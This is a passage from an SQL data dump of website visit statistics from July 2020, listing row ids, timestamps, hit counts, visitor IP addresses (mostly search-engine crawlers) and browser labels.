,(520320,1594026418,3,3,0,0,'66.249.70.70','chrome'),(520321,1594026636,2,2,0,0,'35.175.133.127','other'),(520322,1594026982,1,1,0,0,'157.55.39.58','other'),(520323,1594027326,2,2,0,0,'66.249.70.72','chrome'),(520324,1594027402,1,1,0,0,'213.180.203.16','other'),(520325,1594027581,1,1,0,0,'66.249.64.33','chrome'),(520326,1594027824,4,4,0,0,'35.175.133.127','other'),(520327,1594027836,1,0,1,0,'66.249.70.69',''),(520328,1594028420,1,1,0,0,'66.249.70.70','chrome'),(520329,1594029069,1,1,0,0,'207.46.13.154','other'),(520330,1594029103,1,1,0,0,'157.55.39.53','other'),(520331,1594029463,4,4,0,0,'35.175.133.127','other'),(520332,1594029774,1,1,0,0,'66.249.64.33','chrome'),(520333,1594029965,1,1,0,0,'3.236.104.32','chrome'),(520334,1594030678,1,1,0,0,'66.249.70.70','chrome'),(520335,1594030739,2,2,0,0,'35.175.133.127','other'),(520336,1594030962,2,2,0,0,'178.154.200.222','other'),(520337,1594031202,1,1,0,0,'178.154.200.97','other'),(520338,1594031288,1,1,0,0,'66.249.70.72','chrome'),(520339,1594032145,1,1,0,0,'51.77.52.160','chrome'),(520340,1594032147,1,1,0,0,'157.55.39.53','other'),(520341,1594032651,1,1,0,0,'77.111.244.55','chrome'),(520342,1594032713,1,1,0,0,'213.180.203.17','other'),(520343,1594033497,1,1,0,0,'66.249.70.72','chrome'),(520344,1594033833,1,1,0,0,'207.46.13.154','other'),(520345,1594033842,1,1,0,0,'216.18.204.154','firefox'),(520346,1594033879,1,1,0,0,'109.74.154.72','chrome'),(520347,1594034802,1,1,0,0,'91.196.178.69','chrome'),(520348,1594035255,1,1,0,0,'176.106.5.30','chrome'),(520349,1594035323,1,1,0,0,'37.55.57.64','chrome'),(520350,1594035948,1,1,0,0,'8.29.198.27','other'),(520351,1594036215,8,8,0,0,'185.11.82.228','other'),(520352,1594036516,1,1,0,0,'5.165.253.5','chrome'),(520353,1594036613,1,1,0,0,'8.29.198.25','other'),(520354,1594036745,1,1,0,0,'66.249.70.70','chrome'),(520355,1594037364,3,3,0,0,'66.249.70.69','chrome'),(520356,1594037694,1,1,0,0,'77.111.244.55','chrome'),(520357,1594037958,1,1,0,0,'66.249.70.72','chrome'),(520358,1594038929,1,1,0,0,'91.196.178.69','chrome'),(520359,1594039110,1,1,0,0,'66.249.70.72','chrome'),(520360,1594039255,1,1,0,0,'66.249.64.36','chrome'),(520361,1594039321,1,1,0,0,'213.180.203.17','other'),(520362,1594039480,1,1,0,0,'37.73.161.111','chrome'),(520363,1594039539,1,1,0,0,'66.249.64.38','chrome'),(520364,1594039729,1,1,0,0,'46.182.83.2','firefox'),(520365,1594040616,1,1,0,0,'178.154.200.112','other'),(520366,1594041404,1,1,0,0,'207.46.13.85','other'),(520367,1594041623,1,1,0,0,'66.249.64.36','chrome'),(520368,1594042244,2,2,0,0,'66.249.64.38','chrome'),(520369,1594042297,1,1,0,0,'66.249.70.69','chrome'),(520370,1594042361,2,2,0,0,'18.237.126.35','chrome'),(520371,1594042713,1,1,0,0,'95.133.153.26','chrome'),(520372,1594043572,2,2,0,0,'66.249.70.70','chrome'),(520373,1594043848,1,1,0,0,'66.249.70.69','chrome'),(520374,1594044415,1,1,0,0,'45.89.241.198','chrome'),(520375,1594045461,1,1,0,0,'66.249.70.70','chrome'),(520376,1594045799,2,2,0,0,'157.55.39.53','other'),(520377,1594046451,1,1,0,0,'157.55.39.64','other'),(520378,1594046551,1,1,0,0,'66.249.70.70','chrome'),(520379,1594046894,1,1,0,0,'188.143.145.147','chrome'),(520380,1594046897,1,1,0,0,'8.29.198.26','other'),(520381,1594047321,1,1,0,0,'212.1.124.210','chrome'),(520382,1594047477,1,1,0,0,'8.29.198.27','other'),(520383,1594047655,1,1,0,0,'66.249.70.69','chrome'),(520384,1594048073,2,2,0,0,'66.249.70.72','chrome'),(520385,1594048352,1,1,0,0,'66.249.64.36','chrome'),(520386,1594048988,2,2,0,0,'207.46.13.85','other'),(520387,1594049186,1,1,0,0,'66.249.70.69','chrome'),(520388,1594049374,1,1,0,0,'207.46.13.154','other'),(520389,1594049395,8,8,0,0,'185.11.82.228','other'),(520390,1594050565,1,1,0,0,'66.249.64.36','chrome'),(520391,1594050848,1,1,0,0,'66.249.70.70','chrome'),(520392,1594051572,1,1,0,0,'194.61.24.94','other'),(520393,1594053375,1,1,0,0,'17.58.99.7','other'),(520394,1594053431,1,1,0,0,'66.249.70.72','chrome'),(520395,1594053986,1,1,0,0,'207.46.13.154','other'),(520396,1594055825,1,1,0,0,'66.249.64.33','chrome'),(520397,1594055828,125,125,0,0,'192.151.145.178','other'),(520398,1594056100,1,1,0,0,'207.46.13.85','other'),(520399,1594056428,1,1,0,0,'66.249.70.72','chrome'),(520400,1594056563,2,2,0,0,'66.249.70.70','chrome'),(520401,1594056733,61,61,0,0,'192.151.145.178','other'),(520402,1594057432,1,1,0,0,'66.249.70.72','chrome'),(520403,1594057769,2,2,0,0,'62.210.185.4','chrome'),(520404,1594057821,2,2,0,0,'66.249.70.70','chrome'),(520405,1594057870,1,1,0,0,'8.29.198.26','other'),(520406,1594058068,1,1,0,0,'66.249.70.69','chrome'),(520407,1594058329,1,1,0,0,'8.29.198.25','other'),(520408,1594059919,1,1,0,0,'66.249.64.38','chrome'),(520409,1594060197,1,1,0,0,'66.249.64.33','chrome'),(520410,1594061137,1,1,0,0,'176.9.23.13','chrome'),(520411,1594061313,2,2,0,0,'66.249.70.70','chrome'),(520412,1594061562,1,1,0,0,'157.55.39.64','other'),(520413,1594062227,2,2,0,0,'51.68.11.215','chrome'),(520414,1594062645,1,1,0,0,'157.55.39.58','other'),(520415,1594063063,1,1,0,0,'34.201.24.14','chrome'),(520416,1594063263,1,1,0,0,'66.249.70.69','chrome'),(520417,1594064259,1,1,0,0,'66.249.70.70','chrome'),(520418,1594064722,8,8,0,0,'185.11.82.228','other'),(520419,1594065202,1,1,0,0,'37.73.149.222','chrome'),(520420,1594066165,3,3,0,0,'157.55.39.58','other'),(520421,1594066883,1,1,0,0,'66.249.70.69','chrome'),(520422,1594067167,1,1,0,0,'91.209.11.236','other'),(520423,1594067894,1,1,0,0,'66.249.70.72','chrome'),(520424,1594068186,2,2,0,0,'95.213.141.126','opera'),(520425,1594068742,1,1,0,0,'8.29.198.27','other'),(520426,1594068869,1,1,0,0,'66.249.70.72','chrome'),(520427,1594069171,1,1,0,0,'8.29.198.25','other'),(520428,1594070270,2,2,0,0,'66.249.64.38','chrome'),(520429,1594070459,1,1,0,0,'66.249.70.70','chrome'),(520430,1594071980,2,1,1,0,'66.249.70.70',''),(520431,1594072231,1,1,0,0,'69.16.249.164','chrome'),(520432,1594072479,1,1,0,0,'66.249.70.70','chrome'),(520433,1594072639,1,1,0,0,'66.249.76.114','chrome'),(520434,1594073235,1,1,0,0,'66.249.70.69','chrome'),(520435,1594073385,3,3,0,0,'207.46.13.154','other'),(520436,1594073497,1,1,0,0,'157.55.39.64','other'),(520437,1594074130,2,2,0,0,'104.198.6.124','chrome'),(520438,1594074957,12,12,0,0,'216.18.204.154','firefox'),(520439,1594077850,1,1,0,0,'66.249.70.69','chrome'),(520440,1594079229,1,1,0,0,'207.46.13.154','other'),(520441,1594079637,1,1,0,0,'8.29.198.25','other'),(520442,1594079699,8,8,0,0,'185.11.82.228','other'),(520443,1594079707,1,1,0,0,'62.205.134.182','other'),(520444,1594080026,1,1,0,0,'8.29.198.26','other'),(520445,1594080167,1,1,0,0,'66.249.70.70','chrome'),(520446,1594080363,1,1,0,0,'66.249.70.72','chrome'),(520447,1594081734,1,1,0,0,'157.55.39.53','other'),(520448,1594081737,1,1,0,0,'207.46.13.154','other'),(520449,1594081743,2,2,0,0,'157.55.39.64','other'),(520450,1594081899,1,1,0,0,'66.249.70.69','chrome'),(520451,1594082303,1,1,0,0,'66.249.70.72','chrome'),(520452,1594083718,1,1,0,0,'66.249.70.70','chrome'),(520453,1594084331,1,1,0,0,'157.55.39.53','other'),(520454,1594084953,1,1,0,0,'66.249.70.72','chrome'),(520455,1594085515,1,1,0,0,'157.55.39.58','other'),(520456,1594085880,1,1,0,0,'157.55.39.53','other'),(520457,1594087112,1,1,0,0,'66.249.64.36','chrome'),(520458,1594087971,1,1,0,0,'34.201.24.14','chrome'),(520459,1594088678,1,1,0,0,'66.249.70.69','chrome'),(520460,1594089462,2,2,0,0,'157.55.39.58','other'),(520461,1594090503,1,1,0,0,'8.29.198.25','other'),(520462,1594090862,1,1,0,0,'8.29.198.26','other'),(520463,1594091681,1,1,0,0,'157.55.39.53','other'),(520464,1594091883,2,2,0,0,'66.249.70.72','chrome'),(520465,1594092797,1,1,0,0,'87.250.26.87','chrome'),(520466,1594093947,1,1,0,0,'207.46.13.154','other'),(520467,1594094864,2,2,0,0,'66.249.70.70','chrome'),(520468,1594094879,1,1,0,0,'46.53.246.240','chrome'),(520469,1594095698,1,1,0,0,'66.249.64.33','chrome'),(520470,1594096245,1,1,0,0,'193.58.104.37','chrome'),(520471,1594096317,1,1,0,0,'131.220.6.152','chrome'),(520472,1594096517,1,1,0,0,'66.249.70.69','chrome'),(520473,1594096662,1,1,0,0,'66.249.70.72','chrome'),(520474,1594096675,1,1,0,0,'157.55.39.53','other'),(520475,1594097277,1,1,0,0,'45.89.241.229','chrome'),(520476,1594097648,1,1,0,0,'62.205.134.182','other'),(520477,1594097906,8,8,0,0,'185.11.82.228','other'),(520478,1594099083,1,1,0,0,'66.249.70.69','chrome'),(520479,1594099814,1,1,0,0,'102.165.5.35','chrome'),(520480,1594100033,1,1,0,0,'66.249.70.70','chrome'),(520481,1594100431,1,1,0,0,'66.249.64.38','chrome'),(520482,1594101024,1,1,0,0,'178.154.200.220','other'),(520483,1594101082,1,1,0,0,'207.46.13.151','other'),(520484,1594101374,1,1,0,0,'8.29.198.27','other'),(520485,1594101701,1,1,0,0,'8.29.198.26','other'),(520486,1594101750,1,1,0,0,'157.55.39.64','other'),(520487,1594102007,1,1,0,0,'212.1.124.210','chrome'),(520488,1594102351,1,1,0,0,'157.55.39.53','other'),(520490,1594102781,1,1,0,0,'66.249.64.36','chrome'),(520491,1594102820,2,2,0,0,'207.46.13.85','other'),(520492,1594103313,1,1,0,0,'66.249.70.70','chrome'),(520493,1594103344,1,1,0,0,'178.154.200.222','other'),(520494,1594103897,1,1,0,0,'207.46.13.151','other'),(520495,1594104450,1,1,0,0,'195.123.214.113','msie'),(520496,1594105410,1,1,0,0,'66.249.70.72','chrome'),(520497,1594105767,2,2,0,0,'66.249.70.69','chrome'),(520498,1594105974,1,1,0,0,'207.46.13.85','other'),(520499,1594105981,1,1,0,0,'157.55.39.64','other'),(520500,1594107341,2,2,0,0,'207.46.13.151','other'),(520501,1594107537,1,1,0,0,'207.46.13.154','other'),(520502,1594108085,1,1,0,0,'66.249.70.70','chrome'),(520503,1594108261,1,1,0,0,'46.211.1.75','chrome'),(520504,1594108334,1,1,0,0,'79.135.194.14','other'),(520505,1594109458,1,1,0,0,'66.249.70.72','chrome'),(520506,1594109675,1,1,0,0,'91.196.177.46','chrome'),(520507,1594109853,1,1,0,0,'213.180.203.17','other'),(520508,1594109910,1,1,0,0,'178.154.200.222','other'),(520509,1594110505,2,2,0,0,'207.46.13.154','other'),(520510,1594110661,1,1,0,0,'59.153.145.242','chrome'),(520511,1594110755,1,1,0,0,'46.211.1.75','chrome'),(520512,1594111207,2,2,0,0,'207.46.13.151','other'),(520513,1594111314,1,1,0,0,'157.55.39.64','other'),(520514,1594112242,2,2,0,0,'8.29.198.26','other'),(520515,1594112316,1,1,0,0,'91.196.177.46','chrome'),(520516,1594112415,1,1,0,0,'66.249.70.72','chrome'),(520517,1594112656,1,1,0,0,'91.196.178.187','chrome'),(520518,1594113616,1,1,0,0,'89.46.107.212','chrome'),(520519,1594114729,2,2,0,0,'207.46.13.154','other'),(520520,1594114730,8,8,0,0,'185.11.82.228','other'),(520521,1594114983,1,1,0,0,'157.55.39.58','other'),(520522,1594115103,1,1,0,0,'157.55.39.53','other'),(520523,1594115197,2,2,0,0,'66.249.70.69','chrome'),(520524,1594115342,1,1,0,0,'178.154.200.222','other'),(520525,1594115815,1,1,0,0,'66.249.70.72','chrome'),(520526,1594117166,1,1,0,0,'66.249.70.72','chrome'),(520527,1594117328,3,3,0,0,'66.249.70.69','chrome'),(520528,1594117452,1,1,0,0,'66.249.64.33','chrome'),(520529,1594117650,1,1,0,0,'207.46.13.154','other'),(520530,1594117756,1,1,0,0,'66.249.64.38','chrome'),(520531,1594118037,9,9,0,0,'216.18.204.154','firefox'),(520532,1594118874,1,1,0,0,'157.55.39.64','other'),(520533,1594119297,1,1,0,0,'207.46.13.154','other'),(520534,1594119352,10,10,0,0,'216.18.204.154','firefox'),(520535,1594119515,1,1,0,0,'109.74.154.72','chrome'),(520536,1594119814,1,1,0,0,'66.249.70.72','chrome'),(520537,1594120263,1,1,0,0,'66.249.70.70','chrome'),(520538,1594121361,2,2,0,0,'66.249.70.70','chrome'),(520539,1594121440,1,1,0,0,'157.55.39.53','other'),(520540,1594121541,1,1,0,0,'176.37.4.44','chrome'),(520541,1594121657,1,1,0,0,'157.55.39.64','other'),(520542,1594121714,1,1,0,0,'91.196.177.147','chrome'),(520543,1594121981,5,5,0,0,'66.249.70.69','chrome'),(520544,1594122044,1,1,0,0,'178.154.200.236','other'),(520545,1594122293,5,5,0,0,'66.249.70.70','chrome'),(520546,1594122915,3,3,0,0,'66.249.70.69','chrome'),(520547,1594123103,1,1,0,0,'8.29.198.26','other'),(520548,1594123202,1,1,0,0,'157.55.39.64','other'),(520549,1594123326,3,3,0,0,'66.249.70.70','chrome'),(520550,1594123392,1,1,0,0,'8.29.198.27','other'),(520551,1594123403,1,1,0,0,'89.46.105.169','chrome'),(520552,1594123471,1,1,0,0,'66.249.70.72','chrome'),(520553,1594123496,1,1,0,0,'157.55.39.53','other'),(520554,1594124358,2,2,0,0,'207.46.13.151','other'),(520555,1594124617,2,2,0,0,'80.150.6.150','chrome'),(520556,1594124733,1,1,0,0,'66.249.70.70','chrome'),(520557,1594124869,1,1,0,0,'66.249.70.72','chrome'),(520558,1594125087,1,0,1,0,'66.249.70.69',''),(520559,1594125166,1,1,0,0,'91.196.178.108','chrome'),(520560,1594125299,1,1,0,0,'79.135.194.14','other'),(520561,1594125534,1,1,0,0,'91.196.178.161','firefox'),(520562,1594126197,2,2,0,0,'66.249.70.69','chrome'),(520563,1594126607,1,1,0,0,'176.37.4.44','firefox'),(520564,1594126861,1,1,0,0,'157.55.39.53','other'),(520565,1594127077,1,1,0,0,'66.249.64.33','chrome'),(520566,1594127242,2,2,0,0,'66.249.70.70','chrome'),(520567,1594127451,1,1,0,0,'178.154.200.222','other'),(520568,1594127584,1,1,0,0,'132.148.35.84','chrome'),(520569,1594127697,1,1,0,0,'66.249.64.38','chrome'),(520570,1594127699,1,1,0,0,'103.31.232.173','chrome'),(520571,1594128539,1,1,0,0,'66.249.70.69','chrome'),(520572,1594128994,1,1,0,0,'66.249.70.72','chrome'),(520573,1594129179,1,1,0,0,'194.61.24.94','other'),(520574,1594129270,1,1,0,0,'178.208.83.21','chrome'),(520575,1594129301,2,2,0,0,'91.208.99.2','chrome'),(520576,1594129342,1,1,0,0,'157.55.39.53','other'),(520577,1594129378,1,1,0,0,'207.46.13.85','other'),(520578,1594129733,1,1,0,0,'66.249.70.70','chrome'),(520579,1594129892,4,4,0,0,'52.39.188.21','other'),(520580,1594130070,2,2,0,0,'66.249.70.69','chrome'),(520581,1594130649,3,3,0,0,'89.46.105.229','chrome'),(520582,1594130879,3,3,0,0,'66.249.70.72','chrome'),(520583,1594130939,1,1,0,0,'66.249.64.36','chrome'),(520584,1594130941,1,1,0,0,'66.249.70.70','chrome'),(520585,1594130970,1,1,0,0,'209.17.96.250','other'),(520586,1594131178,1,1,0,0,'66.249.70.69','chrome'),(520587,1594131431,1,1,0,0,'66.249.64.38','chrome'),(520588,1594131521,1,1,0,0,'157.55.39.64','other'),(520589,1594131621,2,2,0,0,'178.154.200.222','other'),(520590,1594131791,8,8,0,0,'185.11.82.228','other'),(520591,1594131792,2,2,0,0,'207.46.13.151','other'),(520592,1594132013,1,1,0,0,'213.87.136.167','chrome'),(520593,1594132353,2,2,0,0,'66.249.70.69','chrome'),(520594,1594132443,2,2,0,0,'51.68.11.207','chrome'),(520595,1594132483,2,2,0,0,'207.46.13.85','other'),(520596,1594132503,1,1,0,0,'154.95.243.42','chrome'),(520597,1594132541,2,2,0,0,'66.249.70.72','chrome'),(520598,1594132682,2,2,0,0,'66.249.64.36','chrome'),(520599,1594132743,1,1,0,0,'207.46.13.154','other'),(520600,1594133800,2,2,0,0,'45.13.160.146','chrome'),(520601,1594133962,2,2,0,0,'8.29.198.27','other'),(520602,1594134046,2,2,0,0,'66.249.70.69','chrome'),(520603,1594134144,1,1,0,0,'47.75.168.207','chrome'),(520604,1594134565,1,1,0,0,'207.46.13.85','other'),(520605,1594134679,2,2,0,0,'66.249.70.72','chrome'),(520606,1594134881,1,1,0,0,'66.249.64.33','chrome'),(520607,1594135010,1,1,0,0,'89.46.104.182','chrome'),(520608,1594135059,2,2,0,0,'66.249.70.70','chrome'),(520609,1594135316,2,2,0,0,'154.95.243.42','chrome'),(520610,1594135526,2,2,0,0,'154.90.68.54','chrome'),(520611,1594135830,1,1,0,0,'178.154.200.196','other'),(520612,1594136241,10,10,0,0,'216.18.204.154','firefox'),(520613,1594136389,2,2,0,0,'66.249.70.70','chrome'),(520614,1594136495,1,1,0,0,'66.249.64.33','chrome'),(520615,1594136545,1,1,0,0,'66.249.70.72','chrome'),(520616,1594136613,1,1,0,0,'157.55.39.58','other'),(520617,1594137068,2,2,0,0,'89.46.105.252','chrome'),(520618,1594137265,1,1,0,0,'157.55.39.53','other'),(520619,1594137272,1,1,0,0,'207.46.13.154','other'),(520620,1594137388,1,1,0,0,'66.249.70.70','chrome'),(520621,1594137630,1,1,0,0,'66.249.70.69','chrome'),(520622,1594138360,1,1,0,0,'207.46.13.85','other'),(520623,1594138431,1,1,0,0,'66.249.70.72','chrome'),(520624,1594138568,1,1,0,0,'66.249.64.33','chrome'),(520625,1594138667,1,1,0,0,'178.154.200.222','other'),(520626,1594138761,4,4,0,0,'91.208.99.2','chrome'),(520627,1594138799,1,1,0,0,'178.154.200.236','other'),(520628,1594139452,3,3,0,0,'66.249.70.72','chrome'),(520629,1594139530,1,1,0,0,'66.249.64.36','chrome'),(520630,1594139635,1,1,0,0,'66.249.70.69','chrome'),(520631,1594139845,2,2,0,0,'91.196.177.228','chrome'),(520632,1594140268,3,3,0,0,'188.166.218.146','chrome'),(520633,1594140421,1,1,0,0,'207.46.13.154','other'),(520634,1594140424,2,2,0,0,'66.249.70.72','chrome'),(520635,1594140794,1,1,0,0,'207.46.13.151','other'),(520636,1594141017,3,3,0,0,'66.249.70.69','chrome'),(520637,1594141324,1,1,0,0,'178.154.200.191','other'),(520638,1594141336,2,2,0,0,'66.249.70.72','chrome'),(520639,1594141668,2,2,0,0,'198.38.84.223','chrome'),(520640,1594142062,1,1,0,0,'66.249.70.69','chrome'),(520641,1594142106,2,2,0,0,'66.249.70.70','chrome'),(520642,1594142412,1,1,0,0,'207.46.13.85','other'),(520643,1594142471,1,1,0,0,'66.249.64.33','chrome'),(520644,1594142790,1,1,0,0,'207.46.13.154','other'),(520645,1594142929,3,3,0,0,'157.55.39.64','other'),(520646,1594142973,2,2,0,0,'66.249.70.72','chrome'),(520647,1594143009,5,5,0,0,'66.249.70.69','chrome'),(520648,1594143031,3,3,0,0,'66.249.70.70','chrome'),(520649,1594143530,10,10,0,0,'216.18.204.154','firefox'),(520650,1594143570,1,1,0,0,'192.185.81.239','chrome'),(520651,1594143606,1,1,0,0,'66.249.64.33','chrome'),(520652,1594143867,1,1,0,0,'66.249.64.38','chrome'),(520653,1594143896,1,1,0,0,'66.249.70.72','chrome'),(520654,1594144198,1,1,0,0,'207.46.13.154','other'),(520655,1594144727,1,1,0,0,'66.249.70.69','chrome'),(520656,1594144757,1,1,0,0,'81.88.49.51','chrome'),(520657,1594144837,1,1,0,0,'8.29.198.26','other'),(520658,1594144841,1,1,0,0,'66.249.70.70','chrome'),(520659,1594144852,1,1,0,0,'46.37.171.183','chrome'),(520660,1594144932,3,3,0,0,'162.223.88.76','chrome'),(520661,1594144950,1,1,0,0,'157.55.39.64','other'),(520662,1594145068,1,1,0,0,'8.29.198.25','other'),(520663,1594145098,1,1,0,0,'157.55.39.58','other'),(520664,1594145910,1,1,0,0,'178.154.200.222','other'),(520665,1594146442,2,2,0,0,'157.55.39.53','other'),(520666,1594146446,1,1,0,0,'157.55.39.64','other'),(520667,1594147111,8,8,0,0,'185.11.82.228','other'),(520668,1594147153,10,10,0,0,'216.18.204.154','firefox'),(520669,1594147448,1,1,0,0,'95.221.54.125','firefox'),(520670,1594147671,1,1,0,0,'207.46.13.151','other'),(520671,1594147774,4,4,0,0,'66.249.70.69','chrome'),(520672,1594147948,1,1,0,0,'178.154.200.241','other'),(520673,1594148007,2,2,0,0,'178.210.68.22','chrome'),(520674,1594148162,1,1,0,0,'128.199.65.117','chrome'),(520675,1594148248,1,1,0,0,'198.49.79.226','chrome'),(520676,1594148551,3,3,0,0,'66.249.70.70','chrome'),(520677,1594148756,1,1,0,0,'66.249.64.33','chrome'),(520678,1594148816,2,2,0,0,'66.249.64.36','chrome'),(520679,1594149248,4,4,0,0,'66.249.70.72','chrome'),(520680,1594149450,1,1,0,0,'5.181.131.145','chrome'),(520681,1594149455,3,3,0,0,'66.249.70.70','chrome'),(520682,1594149579,5,5,0,0,'66.249.70.69','chrome'),(520683,1594149781,1,1,0,0,'85.187.128.28','chrome'),(520684,1594149971,1,1,0,0,'66.249.64.38','chrome'),(520685,1594149981,1,1,0,0,'66.249.64.36','chrome'),(520686,1594150041,1,1,0,0,'66.249.64.33','chrome'),(520687,1594150229,1,1,0,0,'213.180.203.16','other'),(520688,1594150621,5,5,0,0,'66.249.70.69','chrome'),(520689,1594151223,1,1,0,0,'66.249.70.70','chrome'),(520690,1594151518,1,1,0,0,'37.73.145.188','chrome'),(520691,1594151747,1,1,0,0,'207.46.13.151','other'),(520692,1594151767,1,1,0,0,'157.55.39.64','other'),(520693,1594152418,5,5,0,0,'66.249.70.69','chrome'),(520694,1594152633,3,3,0,0,'66.249.70.70','chrome'),(520695,1594152772,1,1,0,0,'157.55.39.64','other'),(520696,1594152775,1,1,0,0,'178.154.200.236','other'),(520697,1594152785,1,1,0,0,'66.249.64.38','chrome'),(520698,1594152796,2,2,0,0,'66.249.64.33','chrome'),(520699,1594152885,2,2,0,0,'67.227.152.219','chrome'),(520700,1594152893,1,1,0,0,'157.55.39.58','other'),(520701,1594152909,2,2,0,0,'66.249.70.72','chrome'),(520702,1594153018,1,1,0,0,'207.46.13.154','other'),(520703,1594153265,2,2,0,0,'213.180.203.16','other'),(520704,1594153831,2,2,0,0,'66.249.64.33','chrome'),(520705,1594154478,2,2,0,0,'51.68.11.215','chrome'),(520706,1594154527,1,1,0,0,'66.249.70.72','chrome'),(520707,1594154671,1,1,0,0,'66.249.64.38','chrome'),(520708,1594154842,2,2,0,0,'66.249.70.69','chrome'),(520709,1594155301,1,1,0,0,'157.55.39.53','other'),(520710,1594155596,2,2,0,0,'66.249.70.70','chrome'),(520711,1594155703,1,1,0,0,'8.29.198.27','other'),(520712,1594155778,1,1,0,0,'170.81.197.73','chrome'),(520713,1594155907,1,1,0,0,'8.29.198.26','other'),(520714,1594156179,1,1,0,0,'129.226.69.89','chrome'),(520715,1594156270,1,1,0,0,'66.249.64.38','chrome'),(520716,1594156647,3,3,0,0,'66.249.70.70','chrome'),(520717,1594156850,1,1,0,0,'66.249.70.72','chrome'),(520718,1594156925,4,4,0,0,'66.249.70.69','chrome'),(520719,1594157094,1,1,0,0,'157.55.39.58','other'),(520720,1594157575,1,1,0,0,'51.15.72.153','chrome'),(520721,1594157779,2,2,0,0,'72.13.46.2','other'),(520722,1594157884,1,1,0,0,'157.55.39.64','other'),(520723,1594157895,1,1,0,0,'178.154.200.220','other'),(520724,1594157950,1,1,0,0,'198.38.82.11','chrome'),(520725,1594158069,1,1,0,0,'66.249.70.72','chrome'),(520726,1594158122,8,8,0,0,'66.249.70.69','chrome'),(520727,1594158715,3,3,0,0,'66.249.70.70','chrome'),(520728,1594159122,1,1,0,0,'157.55.39.53','other'),(520729,1594159289,2,2,0,0,'93.73.77.125','chrome'),(520730,1594159359,2,2,0,0,'62.210.185.4','chrome'),(520731,1594159510,1,1,0,0,'66.249.70.72','chrome'),(520732,1594159822,1,1,0,0,'66.249.70.69','chrome'),(520733,1594160280,1,1,0,0,'66.249.70.70','chrome'),(520734,1594160346,2,2,0,0,'207.46.13.151','other'),(520735,1594160419,2,2,0,0,'66.249.64.33','chrome'),(520736,1594160512,2,2,0,0,'66.249.70.72','chrome'),(520737,1594160757,1,1,0,0,'102.165.5.163','chrome'),(520738,1594160812,1,1,0,0,'154.95.243.42','chrome'),(520739,1594161248,2,2,0,0,'66.249.70.69','chrome'),(520740,1594161323,1,1,0,0,'66.249.64.36','chrome'),(520741,1594161596,1,1,0,0,'66.249.64.38','chrome'),(520742,1594161701,1,1,0,0,'66.249.70.70','chrome'),(520743,1594161752,3,3,0,0,'66.249.70.72','chrome'),(520744,1594162266,1,1,0,0,'185.208.164.125','chrome'),(520745,1594162354,2,2,0,0,'46.37.171.183','chrome'),(520746,1594162554,1,1,0,0,'154.81.86.238','chrome'),(520747,1594162683,1,1,0,0,'66.249.64.36','chrome'),(520748,1594162877,1,1,0,0,'178.154.200.220','other'),(520749,1594162988,1,1,0,0,'157.55.39.58','other'),(520750,1594163440,8,8,0,0,'185.11.82.228','other'),(520751,1594163957,1,1,0,0,'87.236.20.168','chrome'),(520752,1594164002,1,1,0,0,'207.46.13.151','other'),(520753,1594164021,1,1,0,0,'45.76.213.227','chrome'),(520754,1594164034,2,2,0,0,'186.202.153.166','chrome'),(520755,1594164050,1,1,0,0,'66.249.70.69','chrome'),(520756,1594164108,4,4,0,0,'66.249.64.33','chrome'),(520757,1594164150,1,1,0,0,'66.249.70.72','chrome'),(520758,1594164223,1,1,0,0,'178.154.200.222','other'),(520759,1594164610,2,2,0,0,'66.249.64.38','chrome'),(520760,1594165426,1,1,0,0,'213.180.203.17','other'),(520761,1594165630,2,2,0,0,'47.52.43.140','chrome'),(520762,1594165809,1,1,0,0,'178.154.200.196','other'),(520763,1594166089,1,1,0,0,'178.154.200.92','other'),(520764,1594166107,1,1,0,0,'62.205.134.182','other'),(520765,1594166567,2,2,0,0,'8.29.198.27','other'),(520766,1594166577,1,1,0,0,'207.46.13.154','other'),(520767,1594166689,1,1,0,0,'157.55.39.58','other'),(520768,1594168001,1,1,0,0,'157.55.39.64','other'),(520769,1594168141,1,1,0,0,'207.46.13.154','other'),(520770,1594168143,2,2,0,0,'66.249.70.70','chrome'),(520771,1594168966,2,2,0,0,'66.249.70.72','chrome'),(520772,1594169261,1,1,0,0,'62.173.145.191','chrome'),(520773,1594169469,1,1,0,0,'178.154.200.196','other'),(520774,1594169746,1,1,0,0,'66.249.70.70','chrome'),(520775,1594170064,1,1,0,0,'207.46.13.85','other'),(520776,1594170288,2,2,0,0,'207.46.13.154','other'),(520777,1594170342,2,2,0,0,'178.210.89.154','chrome'),(520778,1594170344,2,2,0,0,'51.68.11.195','chrome'),(520779,1594170740,1,1,0,0,'157.55.39.64','other'),(520780,1594170867,1,1,0,0,'66.249.70.70','chrome'),(520781,1594171147,1,1,0,0,'66.249.64.38','chrome'),(520782,1594171579,1,1,0,0,'66.249.70.69','chrome'),(520783,1594171583,1,1,0,0,'66.249.70.72','chrome'),(520784,1594171708,1,1,0,0,'66.249.64.36','chrome'),(520785,1594171851,1,1,0,0,'178.154.200.222','other'),(520786,1594171904,2,2,0,0,'97.74.24.135','chrome'),(520787,1594172121,2,2,0,0,'128.199.65.117','chrome'),(520788,1594172779,10,10,0,0,'216.18.204.154','firefox'),(520789,1594173082,1,1,0,0,'66.249.70.72','chrome'),(520790,1594173276,1,1,0,0,'66.249.64.36','chrome'),(520791,1594173352,2,2,0,0,'66.249.70.69','chrome'),(520792,1594173900,11,11,0,0,'216.18.204.154','firefox'),(520793,1594174217,1,1,0,0,'66.249.70.72','chrome'),(520794,1594174466,1,1,0,0,'207.46.13.151','other'),(520795,1594175038,1,1,0,0,'51.15.141.220','firefox'),(520796,1594175165,1,1,0,0,'47.52.43.140','chrome'),(520797,1594176168,1,1,0,0,'178.154.200.222','other'),(520798,1594176381,1,1,0,0,'157.55.39.58','other'),(520799,1594176798,1,1,0,0,'66.249.70.69','chrome'),(520800,1594176805,1,1,0,0,'5.45.36.248','chrome'),(520801,1594176847,1,1,0,0,'66.249.70.70','chrome'),(520802,1594177170,1,1,0,0,'157.55.39.53','other'),(520803,1594177404,1,1,0,0,'8.29.198.27','other'),(520804,1594177579,1,1,0,0,'8.29.198.25','other'),(520805,1594178127,1,1,0,0,'209.17.97.106','other'),(520806,1594178155,1,1,0,0,'66.249.70.69','chrome'),(520807,1594178222,1,1,0,0,'185.32.188.19','chrome'),(520808,1594179642,1,1,0,0,'37.251.155.42','chrome'),(520809,1594179745,2,2,0,0,'66.249.70.70','chrome'),(520810,1594179767,8,8,0,0,'185.11.82.228','other'),(520811,1594180508,2,2,0,0,'66.249.70.69','chrome'),(520812,1594181376,1,1,0,0,'157.55.39.53','other'),(520813,1594181516,1,1,0,0,'66.249.64.33','chrome'),(520814,1594181794,3,3,0,0,'66.249.70.70','chrome'),(520815,1594181880,2,2,0,0,'66.249.70.69','chrome'),(520816,1594182027,1,1,0,0,'178.154.200.222','other'),(5